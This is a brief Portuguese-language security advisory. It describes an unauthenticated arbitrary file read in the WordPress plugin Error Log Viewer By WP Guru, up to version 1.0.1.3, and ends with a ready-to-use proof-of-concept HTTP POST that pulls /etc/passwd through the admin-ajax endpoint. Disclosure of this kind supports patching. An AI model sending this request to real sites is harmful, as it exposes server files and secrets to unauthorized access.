
Error Log Viewer By WP Guru <= 1.0.1.3 - Falta de Autorização para Leitura Arbitrária de Arquivos sem Autenticação
Error Log Viewer By WP Guru <= 1.0.1.3 - Falta de Autorização para Leitura Arbitrária de Arquivo Não Autenticada
O plugin Error Log Viewer By WP Guru para WordPress é vulnerável a Leitura Arbitrária de Arquivo em todas as versões até, e incluindo, a 1.0.1.3, por meio da ação AJAX wp_ajax_nopriv_elvwp_log_download. Isso possibilita que atacantes não autenticados leiam o conteúdo de arquivos arbitrários no servidor, que pode conter informações sensíveis.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd